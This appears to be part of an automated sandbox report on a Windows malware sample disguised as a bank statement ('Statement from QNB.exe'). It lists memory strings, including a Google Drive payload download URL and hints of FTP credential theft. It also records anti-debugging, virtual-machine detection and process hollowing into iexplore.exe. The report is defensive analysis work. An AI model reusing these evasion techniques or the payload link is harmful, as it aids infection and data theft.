Source: Statement from QNB.exe, 00000000.00000002.80793649884.0000000003259000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019473908.00000000024D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299370235.00000000031F9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389447824.0000000003339000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471649209.00000000031D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500830246.0000000002659000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579465361.00000000025A9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81387187275.000000000070D000.00000004.00000020.sdmp Binary or memory string: iles\Qemu-ga\qemu-ga.exe
Source: Statement from QNB.exe, 00000000.00000002.80793649884.0000000003259000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019473908.00000000024D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299370235.00000000031F9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389447824.0000000003339000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471649209.00000000031D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500830246.0000000002659000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579465361.00000000025A9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Statement from QNB.exe, 00000004.00000002.81019432165.0000000002410000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500589243.0000000002430000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579414124.00000000024E0000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653026045.0000000002400000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81387187275.000000000070D000.00000004.00000020.sdmp Binary or memory string: \qemu-ga.exe
Source: Statement from QNB.exe, 00000000.00000002.80793649884.0000000003259000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019473908.00000000024D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299370235.00000000031F9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389447824.0000000003339000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471649209.00000000031D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500830246.0000000002659000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579465361.00000000025A9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81296329023.0000000000684000.00000004.00000020.sdmp Binary or memory string: \Qemu-ga\qemu-ga.exe]
Source: Statement from QNB.exe, 00000000.00000002.80793649884.0000000003259000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019473908.00000000024D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299370235.00000000031F9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389447824.0000000003339000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471649209.00000000031D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500830246.0000000002659000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579465361.00000000025A9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: Statement from QNB.exe, 00000004.00000002.81017233540.00000000007F8000.00000004.00000020.sdmp, Statement from QNB.exe, 00000004.00000002.81017793700.0000000000842000.00000004.00000020.sdmp, Statement from QNB.exe, 00000004.00000002.81018130653.0000000000865000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499701669.000000000092E000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578596018.0000000000A5F000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81577732340.00000000009C8000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81652033906.000000000072D000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651299450.00000000006C3000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: iexplore.exe, 0000000C.00000002.85677305262.0000000002FFF000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499073126.00000000008C2000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW@n
Source: Statement from QNB.exe, 00000000.00000002.80792527945.0000000002C40000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019432165.0000000002410000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299206687.0000000003130000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389267225.0000000002DE0000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471560919.0000000003110000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500589243.0000000002430000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579414124.00000000024E0000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653026045.0000000002400000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Statement from QNB.exe, 00000000.00000002.80793649884.0000000003259000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019473908.00000000024D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299370235.00000000031F9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389447824.0000000003339000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471649209.00000000031D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500830246.0000000002659000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579465361.00000000025A9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: Statement from QNB.exe, 00000000.00000002.80793649884.0000000003259000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019473908.00000000024D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299370235.00000000031F9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389447824.0000000003339000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471649209.00000000031D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500830246.0000000002659000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579465361.00000000025A9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: Statement from QNB.exe, 00000000.00000002.80793649884.0000000003259000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81019473908.00000000024D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000000F.00000002.81299370235.00000000031F9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000015.00000002.81389447824.0000000003339000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000016.00000002.81471649209.00000000031D9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500830246.0000000002659000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81579465361.00000000025A9000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653239447.00000000025E9000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\Statement from QNB.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\Statement from QNB.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Thread information set: HideFromDebugger
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_00408B60 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary, 17_2_00408B60
Contains functionality to dynamically determine API calls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_00404C9D LoadLibraryA,GetProcAddress, 14_2_00404C9D
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_0230377C rdtsc 0_2_0230377C
Enables debug privileges
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_022FD0BD mov eax, dword ptr fs:[00000030h] 0_2_022FD0BD
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_02302CF6 mov eax, dword ptr fs:[00000030h] 0_2_02302CF6
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_023020CD mov eax, dword ptr fs:[00000030h] 0_2_023020CD
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_02304D65 mov eax, dword ptr fs:[00000030h] 0_2_02304D65
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BED0BD mov eax, dword ptr fs:[00000030h] 15_2_02BED0BD
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BF2CF6 mov eax, dword ptr fs:[00000030h] 15_2_02BF2CF6
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BF20CD mov eax, dword ptr fs:[00000030h] 15_2_02BF20CD
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BF4D65 mov eax, dword ptr fs:[00000030h] 15_2_02BF4D65
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006C2CF6 mov eax, dword ptr fs:[00000030h] 21_2_006C2CF6
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006C20CD mov eax, dword ptr fs:[00000030h] 21_2_006C20CD
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006BD0BD mov eax, dword ptr fs:[00000030h] 21_2_006BD0BD
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006C4D65 mov eax, dword ptr fs:[00000030h] 21_2_006C4D65
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CF20CD mov eax, dword ptr fs:[00000030h] 22_2_02CF20CD
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CF2CF6 mov eax, dword ptr fs:[00000030h] 22_2_02CF2CF6
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CED0BD mov eax, dword ptr fs:[00000030h] 22_2_02CED0BD
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CF4D65 mov eax, dword ptr fs:[00000030h] 22_2_02CF4D65
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_005720CD mov eax, dword ptr fs:[00000030h] 23_2_005720CD
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_00572CF6 mov eax, dword ptr fs:[00000030h] 23_2_00572CF6
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_0056D0BD mov eax, dword ptr fs:[00000030h] 23_2_0056D0BD
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_00574D65 mov eax, dword ptr fs:[00000030h] 23_2_00574D65
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_2_005720CD mov eax, dword ptr fs:[00000030h] 25_2_005720CD
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_2_00572CF6 mov eax, dword ptr fs:[00000030h] 25_2_00572CF6
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_2_0056D0BD mov eax, dword ptr fs:[00000030h] 25_2_0056D0BD
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_2_00574D65 mov eax, dword ptr fs:[00000030h] 25_2_00574D65
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_005720CD mov eax, dword ptr fs:[00000030h] 26_2_005720CD
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_00572CF6 mov eax, dword ptr fs:[00000030h] 26_2_00572CF6
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_0056D0BD mov eax, dword ptr fs:[00000030h] 26_2_0056D0BD
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_00574D65 mov eax, dword ptr fs:[00000030h] 26_2_00574D65
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Statement from QNB.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\Statement from QNB.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_022FD72E LdrInitializeThunk, 0_2_022FD72E
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CF697A RtlAddVectoredExceptionHandler, 22_2_02CF697A

HIPS / PFW / Operating System Protection Evasion:

Sample uses process hollowing technique
Source: C:\Users\user\Desktop\Statement from QNB.exe Section unmapped: C:\Program Files (x86)\Internet Explorer\iexplore.exe base address: 400000
Writes to foreign memory regions
Source: C:\Users\user\Desktop\Statement from QNB.exe Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000
Source: C:\Users\user\Desktop\Statement from QNB.exe Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 401000
Source: C:\Users\user\Desktop\Statement from QNB.exe Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 43E000
Source: C:\Users\user\Desktop\Statement from QNB.exe Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 442000
Source: C:\Users\user\Desktop\Statement from QNB.exe Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 2C50008
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\Statement from QNB.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000 protect: page execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Statement from QNB.exe Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000 value starts with: 4D5A
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Statement from QNB.exe Process created: C:\Users\user\Desktop\Statement from QNB.exe "C:\Users\user\Desktop\Statement from QNB.exe"
Source: C:\Users\user\Desktop\Statement from QNB.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Users\user\Desktop\Statement from QNB.exe
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe"
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe"
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe"
Source: iexplore.exe, 0000000C.00000002.85677855007.0000000003048000.00000004.00000020.sdmp Binary or memory string: H100|0h 0m 0s|1076|Program Manager|108S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.pas28- 405_
Source: iexplore.exe, 0000000C.00000002.85677855007.0000000003048000.00000004.00000020.sdmp Binary or memory string: H100|0h 0m 0s|1076|Program Manager|10illa\sitemanager.xmlI1C4O6V0D4\nyuimqkss4txtkss4.txt">
Source: iexplore.exe, 0000000C.00000002.85677305262.0000000002FFF000.00000004.00000020.sdmp Binary or memory string: 0|Test - Xpert|United Kingdom|user - 405464|2.10.0|GB|0h 0m 0s|3.0.10|1|-4|0|Program Manager|X||]-[O$
Source: iexplore.exe, 0000000C.00000002.85677305262.0000000002FFF000.00000004.00000020.sdmp Binary or memory string: D100|0h 0m 0s|1076|Program Manager|2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss3Y1-J1N8-O887-M0I1C4O6V0D4.pas
Source: iexplore.exe, iexplore.exe, 0000000C.00000002.85678878066.00000000037E1000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: iexplore.exe, 0000000C.00000002.85678878066.00000000037E1000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: Statement from QNB.exe, 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp, iexplore.exe, iexplore.exe, 0000000C.00000002.85678878066.00000000037E1000.00000002.00020000.sdmp, iexplore.exe, 0000000C.00000002.85673128439.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 0000000C.00000000.80980312275.0000000000400000.00000040.00000001.sdmp Binary or memory string: Progman
Source: iexplore.exe, 0000000C.00000002.85678024206.0000000003055000.00000004.00000020.sdmp Binary or memory string: 100|0h 0m 0s|1076|Program Manager|15
Source: iexplore.exe, 0000000C.00000002.85678024206.0000000003055000.00000004.00000020.sdmp, iexplore.exe, 0000000C.00000002.85677305262.0000000002FFF000.00000004.00000020.sdmp Binary or memory string: 100|0h 0m 0s|1076|Program Manager|10
Source: iexplore.exe, 0000000C.00000002.85677305262.0000000002FFF000.00000004.00000020.sdmp Binary or memory string: $100|0h 0m 0s|1076|Program Manager|10 yE971
